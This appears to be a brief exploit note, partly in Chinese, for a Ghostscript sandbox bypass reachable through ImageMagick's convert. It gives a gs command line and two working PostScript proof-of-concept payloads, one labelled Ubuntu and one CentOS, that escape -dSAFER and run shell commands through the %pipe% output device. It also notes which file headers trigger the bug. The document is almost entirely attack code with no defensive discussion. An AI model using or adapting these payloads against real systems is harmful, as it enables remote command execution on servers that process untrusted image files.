Ghostscript / ImageMagick / convert exploit

开启 ghostscript

gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null

POC

Ubuntu

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%whoami) currentdevice putdeviceprops

CentOS

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

文件开头 PS/EPS/PDF/XPS

%!EPS

都是可以的

About
https://www.anquanke.com/post/id/157513